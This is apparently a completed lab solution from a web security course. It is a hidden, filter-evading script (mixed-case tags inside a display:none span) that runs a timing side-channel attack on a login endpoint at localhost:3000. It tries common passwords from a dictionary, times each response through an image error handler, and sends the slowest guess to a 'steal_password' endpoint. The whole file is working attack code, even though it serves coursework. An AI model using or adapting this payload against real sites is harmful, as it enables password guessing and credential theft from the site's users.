<span style='display:none'>
    <imG id='test' />
    <scripT>
        var dictionary = [`password`, `123456`, `	12345678`, `dragon`, `1234`, `qwerty`, `12345`];
        var index = 0;
        var test = document.getElementById(`test`);
        var time = [];
        test.onerror = () => {
            var end = new Date();

            /* >>>> HINT: you might want to replace this line with something else. */
            console.log(`Time elapsed ${end - start}`);
            time.push(end - start);

            /* <<<<< */

            start = new Date();
            if (index < dictionary.length) {
                /* >>>> TODO: replace string with login GET request */
                test.src = `http://localhost:3000/get_login?username=userx&password=${dictionary[index]}`;
                /* <<<< */
            } else {
                /* >>>> TODO: analyze server's reponse times to guess the password for userx and send your guess to the server <<<<< */
                /* 找到用时最长的下标 */
                var max_idx = -1;
                var max_val = -1;
                for (var i = 0; i < dictionary.length; i++) {
                    if (time[i] > max_val) {
                        max_idx = i;
                        max_val = time[i];
                    }
                }

                var passwd = dictionary[max_idx];
                test.src = `http://localhost:3000/steal_password?password=${passwd}&timeElapsed=${max_val}`;
                test.onerror=function(){};
            }
            index += 1;
        };
        var start = new Date();
        /* >>>> TODO: replace string with login GET request */
        test.src = `http://localhost:3000/get_login?username=userx&password=${dictionary[index]}!`;
        /* <<<< */
        index += 1;
    </scripT>
</span>